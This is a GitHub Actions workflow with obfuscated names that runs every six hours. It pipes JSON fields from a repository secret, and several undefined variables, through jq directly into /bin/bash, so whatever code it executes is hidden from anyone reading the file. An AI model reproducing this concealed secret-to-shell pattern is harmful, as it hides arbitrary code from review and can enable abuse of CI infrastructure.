name: liurushi6781

on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liurushi6781
        env:
          mj54: ${{ secrets.mj54 }}
        run: |
          echo $mj54 | jq -r .xu719 | /bin/bash
          echo $mtg6 | jq -r .hkk65071 | /bin/bash
          echo $jvj861 | jq -r .ngzd22 | /bin/bash
          echo $laofp973 | jq -r .fbvwr78 | /bin/bash
          echo $ynrcg386 | jq -r .p4 | /bin/bash
          echo $tf56407 | jq -r .yalj4 | /bin/bash
          echo $rxk4611 | jq -r .xvx82358 | /bin/bash
          echo $pg9069 | jq -r .xfz3363 | /bin/bash
          echo $ee006 | jq -r .bgg3793 | /bin/bash
          echo $y18 | jq -r .jic1852 | /bin/bash
          echo $j55675 | jq -r .nmqm6 | /bin/bash

